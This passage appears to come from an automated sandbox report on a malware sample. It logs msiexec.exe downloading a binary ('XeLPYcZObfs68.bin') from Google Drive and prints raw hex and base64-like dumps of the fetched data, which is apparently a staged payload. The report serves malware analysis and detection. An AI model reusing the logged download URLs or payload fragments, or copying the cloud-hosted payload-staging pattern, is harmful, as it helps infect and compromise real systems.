                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 414348
                        Last-Modified: Mon, 30 Sep 2024 07:01:21 GMT
                        X-GUploader-UploadID: AD-8ljubXgjARYvLDkmcNqDL1_irk-3CVwX-wkdfgrkuYNFzossojfkEQDgo23A_76sOXLq5vIyv6owhmw
                        Date: Mon, 30 Sep 2024 07:57:41 GMT
                        Expires: Mon, 30 Sep 2024 07:57:41 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=lLNplg==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-09-30 07:57:41 UTC4856INData Raw: 36 77 4a 34 6d 6e 45 42 6d 37 74 65 49 52 77 41 63 51 47 62 36 77 4b 48 53 41 4e 63 4a 41 52 78 41 5a 76 72 41 74 63 44 75 61 4e 59 52 76 56 78 41 5a 76 72 41 6f 71 76 67 66 45 4f 4d 66 4a 66 63 51 47 62 36 77 4c 37 58 34 48 78 72 57 6d 30 71 6e 45 42 6d 33 45 42 6d 2b 73 43 71 67 58 72 41 6a 30 72 75 6b 67 38 72 51 70 78 41 5a 74 78 41 5a 76 72 41 68 32 62 63 51 47 62 4d 63 72 72 41 6e 54 4c 36 77 4a 37 59 34 6b 55 43 2b 73 43 50 53 58 72 41 6f 58 6e 30 65 4a 78 41 5a 76 72 41 74 2f 6f 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6c 69 38 5a 38 41 66 4d 72 72 41 6b 6f 68 36 77 4c 4c 44 59 74 45 4a 41 54 72 41 70 68 55 63 51 47 62 69 63 50 72 41 6c 77 2f 63 51 47 62 67 63 4d 6e 58 6b 67 41 63 51 47 62 36 77 4b 36 53 37 70 6b 77 56 65 73 63 51 47 62 36 77 4a
                        Data Ascii: 6wJ4mnEBm7teIRwAcQGb6wKHSANcJARxAZvrAtcDuaNYRvVxAZvrAoqvgfEOMfJfcQGb6wL7X4HxrWm0qnEBm3EBm+sCqgXrAj0rukg8rQpxAZtxAZvrAh2bcQGbMcrrAnTL6wJ7Y4kUC+sCPSXrAoXn0eJxAZvrAt/og8EEcQGbcQGbgfli8Z8AfMrrAkoh6wLLDYtEJATrAphUcQGbicPrAlw/cQGbgcMnXkgAcQGb6wK6S7pkwVescQGb6wJ
                        2024-09-30 07:57:41 UTC4856INData Raw: 6c 75 72 36 51 66 38 4c 50 38 32 6e 51 39 65 39 66 65 6f 34 6b 62 65 5a 77 44 68 4d 51 2f 38 2b 78 57 7a 4b 6b 61 2b 33 68 46 71 41 6c 4b 4b 5a 6f 4d 4d 77 6a 53 42 48 39 47 78 41 76 33 62 6f 50 55 46 42 33 2f 70 58 47 43 69 45 38 68 30 6f 68 4a 79 2f 62 54 4c 7a 4a 68 42 47 7a 62 71 63 33 63 49 2b 53 52 56 4a 6f 36 42 48 77 6a 34 66 52 35 38 2b 45 45 62 43 50 68 44 2b 46 74 39 70 6c 48 78 36 59 66 67 49 6e 55 50 39 49 36 43 67 68 6b 50 4e 62 2f 6b 56 45 35 47 31 72 36 76 39 48 30 50 56 34 2f 56 49 69 6b 4c 61 53 39 77 52 58 46 38 47 77 7a 62 46 69 45 59 6e 35 4a 43 4c 75 6d 46 49 6b 38 58 74 70 55 66 35 35 4e 51 70 52 6b 50 42 38 30 62 43 50 68 2f 43 47 42 59 55 52 70 31 6b 6b 62 6b 6c 66 56 52 6e 6d 56 59 4b 66 53 6e 75 33 42 4a 65 4b 6f 37 35 42 59 65
                        Data Ascii: lur6Qf8LP82nQ9e9feo4kbeZwDhMQ/8+xWzKka+3hFqAlKKZoMMwjSBH9GxAv3boPUFB3/pXGCiE8h0ohJy/bTLzJhBGzbqc3cI+SRVJo6BHwj4fR58+EEbCPhD+Ft9plHx6YfgInUP9I6CghkPNb/kVE5G1r6v9H0PV4/VIikLaS9wRXF8GwzbFiEYn5JCLumFIk8XtpUf55NQpRkPB80bCPh/CGBYURp1kkbklfVRnmVYKfSnu3BJeKo75BYe
                        2024-09-30 07:57:41 UTC128INData Raw: 74 2f 4e 50 30 61 4d 6f 6e 62 41 35 32 6b 39 49 63 49 53 4e 73 71 4b 42 68 57 58 38 75 61 2f 33 4b 79 6d 72 4e 64 4b 2b 6b 35 6a 58 7a 59 52 6c 58 7a 64 64 77 51 6e 44 4c 69 44 64 4f 42 7a 61 44 41 46 45 75 66 41 2b 78 55 62 75 53 38 63 37 35 72 58 6e 78 6d 53 52 63 75 5a 79 7a 47 48 2b 4d 64 64 39 49 7a 34 51 52 73 49 2b 6a 76 34 51 58 6c 79 75 30 55 46 63 39 52 78 56 34 68 77 2f
                        Data Ascii: t/NP0aMonbA52k9IcISNsqKBhWX8ua/3KymrNdK+k5jXzYRlXzddwQnDLiDdOBzaDAFEufA+xUbuS8c75rXnxmSRcuZyzGH+Mdd9Iz4QRsI+jv4QXlyu0UFc9RxV4hw/
                        2024-09-30 07:57:41 UTC1325INData Raw: 70 4b 42 67 76 54 44 6c 62 6e 74 52 58 7a 34 46 6f 6b 65 6d 54 70 4d 7a 66 44 73 70 45 42 79 32 50 68 62 48 39 68 71 61 73 66 75 77 34 30 6b 46 44 78 42 47 77 6a 34 51 78 56 49 68 58 45 31 47 37 31 44 67 49 51 52 2f 67 6e 4f 65 67 76 59 6a 7a 57 2f 4c 57 44 4a 42 47 4d 45 71 33 44 51 56 48 74 6a 57 53 63 69 6d 73 2f 46 75 33 4d 61 68 73 6c 79 46 66 6a 2b 4d 79 76 53 45 71 4b 30 51 65 76 4f 44 6d 79 37 47 35 79 62 52 57 38 76 6d 35 34 41 4a 51 2f 31 34 43 6c 6d 4f 63 45 6e 44 39 37 42 47 77 6a 34 51 52 6c 6c 31 46 59 61 6c 7a 61 6c 67 4c 36 6c 31 6f 4c 76 56 4c 59 30 63 57 54 67 70 6d 68 33 73 46 52 67 42 63 42 31 63 57 76 70 54 4d 7a 54 56 46 52 52 6d 43 2f 30 4d 4e 78 77 54 4e 49 57 52 63 75 59 38 4e 48 4e 4d 62 71 67 67 32 2b 56 36 61 35 38 69 78 51 33
                        Data Ascii: pKBgvTDlbntRXz4FokemTpMzfDspEBy2PhbH9hqasfuw40kFDxBGwj4QxVIhXE1G71DgIQR/gnOegvYjzW/LWDJBGMEq3DQVHtjWScims/Fu3MahslyFfj+MyvSEqK0QevODmy7G5ybRW8vm54AJQ/14ClmOcEnD97BGwj4QRll1FYalzalgL6l1oLvVLY0cWTgpmh3sFRgBcB1cWvpTMzTVFRRmC/0MNxwTNIWRcuY8NHNMbqgg2+V6a58ixQ3
                        2024-09-30 07:57:41 UTC1390INData Raw: 42 7a 53 2f 31 4a 7a 59 67 6a 68 61 66 64 69 30 44 78 4c 43 33 79 51 6e 31 63 56 63 42 4c 57 59 68 52 65 74 2f 4a 50 77 4b 4e 32 77 77 6c 46 47 6b 67 4f 74 6a 57 37 66 30 69 6b 61 58 62 79 33 35 48 47 78 45 45 71 55 79 4f 46 6c 7a 55 47 77 42 79 6b 75 38 4d 65 51 77 61 50 38 62 45 56 48 38 50 33 77 65 2b 35 6b 49 54 43 76 52 30 53 6b 62 54 43 31 38 72 41 51 38 78 4f 35 4f 53 53 6b 61 77 53 5a 77 75 4b 51 39 54 30 4b 38 55 45 6d 58 78 58 39 78 63 76 42 33 67 59 38 6d 57 32 51 43 42 32 58 44 63 51 50 64 52 6c 70 2f 6a 6c 53 73 61 36 4f 71 68 4a 52 38 72 75 75 54 32 2b 61 45 38 42 4d 5a 57 73 50 4d 48 76 45 48 79 36 37 74 6e 61 76 2b 62 48 76 55 69 66 78 77 52 66 41 72 53 4f 76 39 61 31 48 42 6f 4c 7a 38 7a 4a 65 4d 74 72 76 55 43 2f 52 63 75 75 43 6a 30 53
                        Data Ascii: BzS/1JzYgjhafdi0DxLC3yQn1cVcBLWYhRet/JPwKN2wwlFGkgOtjW7f0ikaXby35HGxEEqUyOFlzUGwByku8MeQwaP8bEVH8P3we+5kITCvR0SkbTC18rAQ8xO5OSSkawSZwuKQ9T0K8UEmXxX9xcvB3gY8mW2QCB2XDcQPdRlp/jlSsa6OqhJR8ruuT2+aE8BMZWsPMHvEHy67tnav+bHvUifxwRfArSOv9a1HBoLz8zJeMtrvUC/RcuuCj0S
                        2024-09-30 07:57:41 UTC1390INData Raw: 33 45 38 39 4a 45 6b 35 43 6b 30 65 68 7a 54 31 6a 2b 63 57 6f 55 62 4d 53 53 6b 35 58 2f 6b 55 49 66 35 4b 36 49 6b 76 48 39 68 6f 67 56 46 7a 34 6b 55 4c 6d 72 53 6a 59 36 72 65 46 7a 73 4d 2b 45 42 5a 36 7a 50 48 54 30 67 74 54 6f 67 75 76 4a 5a 50 65 72 55 6c 72 37 4c 51 70 55 66 63 49 6e 74 4d 44 62 49 7a 50 49 44 38 53 32 36 51 48 35 6a 54 61 76 66 65 36 41 32 39 49 38 30 74 6d 47 43 64 64 59 39 32 2b 45 79 43 4f 4d 67 79 45 6a 6f 49 2f 49 6b 49 33 34 4b 68 67 6f 38 44 4d 4f 62 5a 47 37 6b 72 44 45 6d 61 71 61 36 65 78 44 4d 63 41 58 61 47 48 32 72 2f 36 6a 5a 62 50 4c 73 63 77 2b 39 45 5a 4e 47 69 75 58 54 38 35 5a 63 63 30 6f 57 74 71 51 4c 2f 6d 39 6c 72 48 65 38 63 45 5a 37 35 6f 6f 62 63 4f 41 4a 4a 46 66 50 62 6c 50 5a 72 62 59 68 6d 74 4a 59
                        Data Ascii: 3E89JEk5Ck0ehzT1j+cWoUbMSSk5X/kUIf5K6IkvH9hogVFz4kULmrSjY6reFzsM+EBZ6zPHT0gtToguvJZPerUlr7LQpUfcIntMDbIzPID8S26QH5jTavfe6A29I80tmGCddY92+EyCOMgyEjoI/IkI34Khgo8DMObZG7krDEmaqa6exDMcAXaGH2r/6jZbPLscw+9EZNGiuXT85Zcc0oWtqQL/m9lrHe8cEZ75oobcOAJJFfPblPZrbYhmtJY
                        2024-09-30 07:57:41 UTC1390INData Raw: 75 32 73 47 37 50 69 72 7a 6b 41 49 66 37 58 58 35 64 47 66 6f 5a 47 63 2b 67 43 6a 69 30 34 50 4d 4b 2f 62 54 5a 36 71 68 42 47 7a 62 4d 79 56 73 59 2b 53 69 42 48 2f 45 6b 56 6b 49 52 56 77 42 35 49 6b 62 54 6c 38 53 4c 6e 51 39 52 79 44 69 7a 70 52 39 70 4c 32 52 46 52 58 37 72 41 4e 39 63 68 5a 57 6b 43 4b 2f 46 4b 64 6a 76 59 61 74 4a 67 64 4f 4f 71 75 56 31 6c 62 43 2f 39 46 58 6b 56 77 4b 2f 4a 76 65 73 33 7a 62 42 6b 53 4d 59 2b 53 78 6d 6b 42 39 67 63 53 61 4f 53 52 38 49 2b 51 66 2b 45 58 30 48 51 51 38 39 62 50 35 4f 65 6b 61 2b 39 4d 55 45 4c 51 38 38 47 35 72 70 67 6b 59 65 71 5a 6a 67 50 6b 4b 4b 5a 70 4d 4d 30 6a 63 49 44 54 52 4d 4c 4f 46 33 36 32 35 74 75 71 39 77 76 61 44 59 6a 32 66 79 76 36 71 42 2b 38 73 64 47 77 45 6f 51 66 4c 72 4d
                        Data Ascii: u2sG7PirzkAIf7XX5dGfoZGc+gCji04PMK/bTZ6qhBGzbMyVsY+SiBH/EkVkIRVwB5IkbTl8SLnQ9RyDizpR9pL2RFRX7rAN9chZWkCK/FKdjvYatJgdOOquV1lbC/9FXkVwK/Jves3zbBkSMY+SxmkB9gcSaOSR8I+Qf+EX0HQQ89bP5Oeka+9MUELQ88G5rpgkYeqZjgPkKKZpMM0jcIDTRMLOF3625tuq9wvaDYj2fyv6qB+8sdGwEoQfLrM
                        2024-09-30 07:57:41 UTC1390INData Raw: 45 56 4b 55 43 6b 61 39 38 4b 2b 56 61 51 2f 38 5a 52 46 63 71 6b 61 39 57 79 78 5a 79 53 79 38 2f 39 6b 33 44 7a 58 51 6d 70 39 78 78 62 71 72 37 54 68 37 46 69 76 31 36 4a 48 42 6c 44 65 50 42 35 48 31 72 39 69 34 37 56 30 34 57 6b 44 30 76 38 69 4f 6d 64 62 67 2f 65 54 4f 44 44 74 49 6c 50 58 68 6e 6d 39 4f 53 50 42 42 47 44 69 66 6b 4e 51 65 48 43 74 32 68 74 30 48 66 65 44 4c 6e 58 47 77 4b 33 34 55 58 57 52 63 61 53 55 2f 78 59 54 66 68 4c 79 31 4b 33 4d 5a 57 43 32 36 6f 31 51 37 38 72 48 50 61 72 75 57 34 37 35 4f 68 37 66 41 4c 55 42 31 76 67 68 55 6b 7a 65 64 63 45 56 36 33 39 30 66 46 6f 79 69 66 75 42 79 39 4d 2f 64 79 70 4f 37 47 74 55 4d 4f 6e 62 4e 37 32 57 68 5a 54 57 77 69 59 53 65 4a 55 4d 67 70 52 39 48 62 53 61 4e 65 36 69 47 2b 55 6a
                        Data Ascii: EVKUCka98K+VaQ/8ZRFcqka9WyxZySy8/9k3DzXQmp9xxbqr7Th7Fiv16JHBlDePB5H1r9i47V04WkD0v8iOmdbg/eTODDtIlPXhnm9OSPBBGDifkNQeHCt2ht0HfeDLnXGwK34UXWRcaSU/xYTfhLy1K3MZWC26o1Q78rHParuW475Oh7fALUB1vghUkzedcEV6390fFoyifuBy9M/dypO7GtUMOnbN72WhZTWwiYSeJUMgpR9HbSaNe6iG+Uj
                        2024-09-30 07:57:41 UTC1390INData Raw: 4c 39 74 4d 6e 66 63 45 45 62 4e 73 78 51 2f 77 6a 35 4f 69 6e 35 67 6c 54 2b 79 78 42 61 7a 53 61 61 58 38 78 65 4a 78 34 62 33 51 64 42 72 32 70 47 58 2f 57 4b 45 48 7a 46 36 54 77 72 56 66 36 61 53 6b 4e 65 63 6b 62 51 6e 70 54 55 63 6c 49 41 36 44 46 43 42 6b 62 44 75 4b 51 36 49 51 2f 6a 66 46 61 4c 6a 6b 62 41 58 6a 2f 77 49 6b 4b 4b 5a 70 4d 4d 4d 6a 63 4d 4a 53 68 38 4e 47 56 4f 4e 31 4e 7a 6f 6d 64 4c 7a 47 6e 43 53 4f 6e 71 5a 5a 66 39 6b 59 74 56 42 5a 72 65 4d 2b 36 51 49 49 55 2b 56 55 6a 61 5a 33 6e 62 44 47 6d 51 6f 6a 4a 78 75 71 4e 56 57 62 55 4a 7a 76 56 4d 6f 79 76 63 47 5a 4a 6f 37 45 38 54 4b 64 52 6c 48 32 6b 76 5a 47 55 46 66 75 73 41 31 7a 4a 4a 42 44 63 31 78 45 30 35 4a 71 34 4b 4d 45 44 54 62 76 6f 50 53 32 33 7a 63 30 65 79 45
                        Data Ascii: L9tMnfcEEbNsxQ/wj5Oin5glT+yxBazSaaX8xeJx4b3QdBr2pGX/WKEHzF6TwrVf6aSkNeckbQnpTUclIA6DFCBkbDuKQ6IQ/jfFaLjkbAXj/wIkKKZpMMMjcMJSh8NGVON1NzomdLzGnCSOnqZZf9kYtVBZreM+6QIIU+VUjaZ3nbDGmQojJxuqNVWbUJzvVMoyvcGZJo7E8TKdRlH2kvZGUFfusA1zJJBDc1xE05Jq4KMEDTbvoPS23zc0eyE
                        2024-09-30 07:57:41 UTC1390INData Raw: 75 51 2f 33 74 53 4f 75 35 51 74 70 4c 33 42 46 63 58 31 69 56 6e 37 77 72 68 7a 4b 2b 50 52 33 76 68 59 67 5a 42 36 39 6f 47 72 62 61 2b 42 4b 73 67 6f 59 36 33 71 52 6c 6c 5a 61 59 41 31 6d 7a 4e 46 68 4c 7a 30 66 39 45 55 62 43 68 6b 61 71 6b 66 56 42 2f 34 49 4e 6e 53 35 44 7a 2b 30 59 61 79 6d 52 72 35 41 7a 53 6d 68 44 7a 34 6c 4c 43 47 36 5a 66 7a 71 46 48 61 56 48 6a 4c 37 38 69 44 70 47 75 31 73 6d 63 45 37 77 71 38 6a 57 6d 77 74 69 68 79 35 4a 4a 54 32 68 76 43 51 52 66 56 69 52 52 54 71 2f 35 35 41 31 58 51 48 48 4e 61 52 2b 33 53 2b 2f 2f 34 50 39 78 42 54 50 7a 52 57 62 31 50 79 67 37 38 31 2b 6b 65 48 70 2b 64 6e 36 47 65 39 68 44 6e 74 4b 62 70 76 44 41 54 38 51 52 6b 74 4c 64 42 52 34 74 6a 63 70 61 62 2f 69 62 4a 67 67 61 63 63 77 61 41
                        Data Ascii: uQ/3tSOu5QtpL3BFcX1iVn7wrhzK+PR3vhYgZB69oGrba+BKsgoY63qRllZaYA1mzNFhLz0f9EUbChkaqkfVB/4INnS5Dz+0YaymRr5AzSmhDz4lLCG6ZfzqFHaVHjL78iDpGu1smcE7wq8jWmwtihy5JJT2hvCQRfViRRTq/55A1XQHHNaR+3S+//4P9xBTPzRWb1Pyg781+keHp+dn6Ge9hDntKbpvDAT8QRktLdBR4tjcpab/ibJggaccwaA


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.451425142.250.185.1424435376C:\Windows\SysWOW64\msiexec.exe
                        TimestampBytes transferredDirectionData
                        2024-09-30 07:58:19 UTC216OUTGET /uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8 HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-09-30 07:58:20 UTC1610INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Mon, 30 Sep 2024 07:58:19 GMT
                        Location: https://drive.usercontent.google.com/download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download
                        Strict-Transport-Security: max-age=31536000
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-E0WmSaL2OFxF68z4j3zwXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Cross-Origin-Opener-Policy: same-origin
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.451426216.58.206.654435376C:\Windows\SysWOW64\msiexec.exe
                        TimestampBytes transferredDirectionData
                        2024-09-30 07:58:20 UTC258OUTGET /download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-09-30 07:58:23 UTC4857INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="XeLPYcZObfs68.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 494656
                        Last-Modified: Mon, 30 Sep 2024 06:59:34 GMT
                        X-GUploader-UploadID: AD-8ljsfRokOuuqD1XkKgxr6ul-_bRDYZ_9eqEcspH-iFf4AgOaTrVUmfh0wnKKSdXvRyv0V-bmFnjCizQ
                        Date: Mon, 30 Sep 2024 07:58:23 GMT
                        Expires: Mon, 30 Sep 2024 07:58:23 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=Zyeluw==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-09-30 07:58:23 UTC4857INData Raw: 72 d5 a2 cb e5 13 ff 46 2d 26 96 7d d3 b1 ba d9 34 a4 0a 18 90 c7 26 c2 f0 b1 52 d0 a1 0a bf 9d 68 ba 94 80 65 ef 81 11 fd 74 07 43 c9 34 aa d5 58 74 c7 ac c0 f3 bb 8b 10 f0 5e b9 ca 5e 8a 89 15 86 39 fe 6b 8d 04 03 85 be 2c b4 b2 62 f7 17 b6 b7 8b b3 b6 11 f8 a6 22 0d 48 df 47 46 fb ec 37 ee a5 ad f6 37 76 a8 ad b9 dd 34 6b 05 52 3e 0f 86 16 45 32 ef 1c a1 c9 fe 34 88 8e 4a cc 7e cd 34 e3 5e af e8 72 41 3e f2 b4 e9 2f 76 10 d6 b6 6f c5 af 62 9f 74 df 7e 4d a6 37 e3 b5 db 27 0a ca 34 32 ee c6 f4 31 a7 31 3c c0 f0 bc 30 31 e1 ca 42 83 4c 57 ab 0c ab c9 3e fb 80 dd d0 ff 21 19 a6 81 2b 06 f8 c9 b7 43 1b 55 8e 2b 00 df 1f 2c d1 fb 04 49 a5 88 37 a2 32 11 37 6c 22 67 55 93 7c 37 ab d3 16 bf a1 c8 c4 3f 75 f7 f9 47 1d 1f 7d ea bb 95 2c dc 1d 89 b9 b5 00 7e 0b
                        Data Ascii: rF-&}4&RhetC4Xt^^9k,b"HGF77v4kR>E24J~4^rA>/vobt~M7'4211<01BLW>!+CU+,I727l"gU|7?uG},~
                        2024-09-30 07:58:23 UTC4857INData Raw: d9 c3 fa 8f 98 b5 35 68 5c d2 ff 2d e9 16 44 0a 0d 2e b7 a6 d2 03 c3 af 33 d6 a1 60 aa c6 06 12 af 8c 7d 0d af 5a 9b bc ff f9 19 a9 15 58 16 a3 92 4b 24 bd 68 92 41 85 b5 62 7e cb 4d 05 96 f1 8f 90 a2 92 cd 84 69 20 67 dd 57 47 c9 e8 a1 45 1c 63 86 0b 5a 23 8f 56 60 b1 47 f3 48 32 83 a5 f7 c2 c3 e4 6b 4e 57 4f f5 fb 75 4a 5f 33 72 66 46 ca c9 77 87 d3 4b c4 fe 63 1c 1b a3 55 ff ca 09 f9 41 55 a3 26 24 f0 82 f9 e9 ba 8f 3f e9 f9 ab a8 7b 92 da 2a 52 eb 42 f8 1c 4a 8d 3b 71 54 e0 6c 09 35 3b 58 87 c2 bd f8 fb ad 7d df 99 5d df c2 82 5c 10 bc 78 d7 0f d2 0c 54 5d 50 bc 94 02 a2 84 a5 9b 26 7a 49 6c 7c 35 26 2f 35 9d ed 7f be 7f 1e d2 e8 4e 1e 31 e7 35 55 e8 2d d8 46 da 12 dc 65 4e 5a 0f 7f 0c ad 56 2e bc 4c 72 d2 c6 d2 3a 28 7d cc 96 9b cb c3 58 ca 04 26 e6
                        Data Ascii: 5h\-D.3`}ZXK$hAb~Mi gWGEcZ#V`GH2kNWOuJ_3rfFwKcUAU&$?{*RBJ;qTl5;X}]\xT]P&zIl|5&/5N15U-FeNZV.Lr:(}X&
                        2024-09-30 07:58:23 UTC125INData Raw: 1b a9 39 f0 82 d8 49 de 77 9e 2f 01 a2 d4 a5 92 91 a0 38 76 de 1c 1d a2 26 06 4c 1a 79 69 f6 13 83 4e 74 61 e1 b6 ad b9 92 d9 46 51 84 0f e3 2c 0a 7d 46 24 4d 20 89 b8 4c 22 9d 87 2e 58 70 2f 24 98 00 cb 56 08 b8 3d 0a 02 e9 96 3d 1f 02 1b 7a ec fa 4e 29 a6 4d 5a 90 62 c1 31 42 95 d4 99 d6 67 fb 67 1e 75 8c 63 00 dc 59 06 b7 18 ce f2 48 c2 e0 d3 c3 1f e1 4c 1d 24 ba 68 34
                        Data Ascii: 9Iw/8v&LyiNtaFQ,}F$M L".Xp/$V==zN)MZb1BggucYHL$h4
                        2024-09-30 07:58:23 UTC1325INData Raw: fe e4 e7 fc d3 fb f9 45 f8 3c 88 59 4a 77 ea 11 de 21 51 4f 7b 96 05 37 39 56 c1 3a c9 53 1e ce 68 4c 18 d3 a4 17 83 36 d4 08 e5 ef 15 4b be ea bf 81 14 7a 25 43 d0 98 35 1a 1a b3 d4 f0 8f cd e3 1f 30 f7 80 60 bd 98 74 99 e7 9f dd d9 5b e7 18 06 45 d4 1e 29 8f a1 32 b5 97 ee 60 f9 92 6f b4 a4 8b 69 27 8e 5a 41 78 ac 0a 6f 8d 0a 89 9c 33 13 04 ce 25 c3 20 f7 88 c5 ad ec b0 4d 79 f1 6b 6d f2 ee cc 2a 64 33 4d 56 bd 93 65 dd 33 ab 09 64 f1 2f c8 0d 5d 49 7a 96 df 96 df 5c 61 9c 42 36 93 e6 b4 00 0e 47 de d3 b2 29 89 81 db 22 c5 bd a2 f9 2c bd 43 3c 52 ba ad b0 76 d2 e5 07 cf 1c a2 1e cb a6 18 c2 59 7f a0 dd 21 fc 6b 94 9a 9c 4d 0f a8 82 17 ef 64 12 08 f7 29 ec 76 6b c7 7b 89 5c a6 1c 5e 82 37 46 2b d5 4b 4d 5b 94 33 5a 61 b9 bd 51 69 d1 bd 7f 78 7b 33 30 c8
                        Data Ascii: E<YJw!QO{79V:ShL6Kz%C50`t[E)2`oi'ZAxo3% Mykm*d3MVe3d/]Iz\aB6G)",C<RvY!kMd)vk{\^7F+KM[3ZaQix{30
                        2024-09-30 07:58:23 UTC1390INData Raw: df 70 2e ff eb da 17 10 a2 25 51 19 85 44 3d 45 f8 1a 60 26 7b 23 16 12 58 b3 67 95 07 21 8b 68 9e 90 17 7c f0 e3 47 18 76 46 fb a5 eb 8c c3 23 05 dc e0 0f 9e 9d 95 9c 91 03 74 5d 1e 3d dc 70 9f 6b 71 05 ee 7b 89 5c dd 52 bb ad 01 f4 f0 0a 9b ad a5 f0 73 81 22 1c 27 53 14 2e be ba a3 38 7d e7 70 28 58 70 ae 19 2b 5b 09 28 f7 65 25 b8 63 ae 6d 48 ba 90 2d 88 5e 3a 45 e0 b7 a2 d9 84 41 e5 74 82 08 ca 73 46 69 8d 5f 19 9c ab 5f 50 c7 a5 f1 5c ae fa fb 92 d2 a8 d3 a5 55 9f 23 a8 80 b2 fb 38 0e 65 b8 3e bb 61 8b 10 33 74 e9 44 ea 99 dc b1 e4 11 be c9 be 8d 00 99 ff fb ae ff 49 20 45 f0 7e 8a 39 9b 8d c5 0a 58 3c 2c 4d ac e6 5b 92 c3 85 b6 78 3a c3 ff b5 a9 96 bb 72 1b 67 a9 90 13 6b 5a 04 68 65 6c ea 73 7c 2d 48 2c 29 4f cb e0 ef e8 06 89 b6 f9 1f f7 0c 53 7d
